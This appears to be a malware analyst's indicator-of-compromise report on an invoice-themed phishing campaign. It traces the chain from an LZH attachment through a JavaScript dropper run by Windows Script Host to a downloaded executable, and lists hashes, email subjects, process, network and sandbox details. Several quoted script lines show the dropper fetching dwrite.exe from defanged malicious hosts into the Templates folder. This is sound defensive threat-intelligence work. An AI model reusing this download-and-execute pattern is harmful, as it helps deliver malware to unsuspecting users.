#js_111018

1. #IOC #OptiData #VR #? #lzh #js #WSH
2.  
3. https://pastebin.com/MP3kCSSh
4. https://radetskiy.wordpress.com/?s=WSH
5.  
6. shema
7. --------------
8. email attach(lzh) > js > wsh > get 2URL > %templates%\random.exe
9.  
10. email_headers
11. --------------
12. n/a
13.  
14. email_subjects
15. --------------
16. "рахунки ТОВ Заря. оплатить до конца недели"
17. "Рахунки Богданова за 10е"
18.  
19. files
20. --------------
21. SHA-256 a146baacebf4889c153bb28e37b013d09730265e3fa70f5542d9a878cf103ac2
22. File name Рахунки до оплати ТОВ СМБ.lzh LHarc 1.x/ARX archive data [lh0]
23. File size 86.76 KB
24.  
25. SHA-256 241851549298ad7fe353c62a6f8e9fa2fdf50a1fb2160bc72588904fe49522c3
26. File name QoC5kb2N4?= [CLEAN]
27. File size 5.73 KB
28.  
29. SHA-256 d6995bdfa7e95b5bb1d64931cbeedfb48a5c9b3d76494a1b2d4121fa7a6e25d0
30. File name Pax. 00295 10.10.2018p.xls.js
31. File size 80.94 KB
32.  
33. SHA-256 d3a9a5b6f02b8df627d0e792fdd15761a9cefd12f5464466eca30ac90b7b911e
34. File name 82371Equipmentthe > [dwrite.exe] !This program cannot be run in DOS mode
35. File size 428 KB
36.  
37. script
38. --------------
39. var wsh = new ActiveXObject("wscript.shell");
40. var path = wsh.SpecialFolders("templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
41. HTTP.Open("GET", "http://sfbotvinnik{.} icu/folua/dwrite.exe", false); HTTP.Send();
42. else
43. { HTTP.Open("GET", "http://centurionsix{.} website/folua/dwrite.exe", false);
44.  
45. activity
46. **************
47.  
48. proc
49. --------------
50. "C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax. 00295 10.10.2018p.xls.js"
51. "C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\658656.exe"
52.  
53. netwrk
54. --------------
55. 93.179.68.94 sfbotvinnik{.} icu GET /folua/dwrite.exe HTTP/1.1 Mozilla/4.0
56.  
57. comp
58. --------------
59. wscript.exe 2204 93.179.68.94 80 ESTABLISHED
60.  
61. persist
62. --------------
63. n/a
64.  
65. # # #
66. https://www.virustotal.com/#/file/a146baacebf4889c153bb28e37b013d09730265e3fa70f5542d9a878cf103ac2/details
67. https://www.virustotal.com/#/file/241851549298ad7fe353c62a6f8e9fa2fdf50a1fb2160bc72588904fe49522c3/details
68. https://www.virustotal.com/#/file/d6995bdfa7e95b5bb1d64931cbeedfb48a5c9b3d76494a1b2d4121fa7a6e25d0/community
69. https://www.virustotal.com/#/file/d3a9a5b6f02b8df627d0e792fdd15761a9cefd12f5464466eca30ac90b7b911e/detection
70. https://analyze.intezer.com/#/analyses/a8fa2a81-4187-4b98-bfc9-4b322edf31bc